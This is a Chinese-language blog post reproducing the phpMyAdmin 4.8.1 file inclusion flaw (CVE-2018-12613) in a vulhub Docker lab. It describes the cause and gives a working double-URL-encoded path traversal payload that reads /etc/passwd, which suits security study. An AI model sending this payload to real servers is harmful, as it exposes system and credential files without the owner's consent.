PhpMyadmin 远程文件包含漏洞(CVE-2018-12613)

环境搭建 漏洞复现 网络安全 vulhub CVE phpmyadmin
漏洞复现
发布日期:   2022-05-12
文章字数:   283
阅读次数:  

PhpMyadmin 远程文件包含漏洞

漏洞简述

攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。

攻击者必须经过身份验证,但在这些情况下除外:

$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;

$ cfg ['ServerDefault'] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。

影响版本

phpmyadmin 4.8.1-4.8.1

环境搭建

cd vulhub/phpmyadmin/CVE-2018-12613
docker-compose up -d

漏洞测试

先打开网页http://192.168.3.151:8080

image-20220512110650500

可以通过远程文件包含查看/etc/passwd

?target=db_sql.php%253f/../../../../etc/passwd

ps:%25是%的url编码,%3f是?的url编码

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/05/12/PhpMyadmin-Remote-File-Inclusion/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
环境搭建 漏洞复现 网络安全 vulhub CVE phpmyadmin
  目录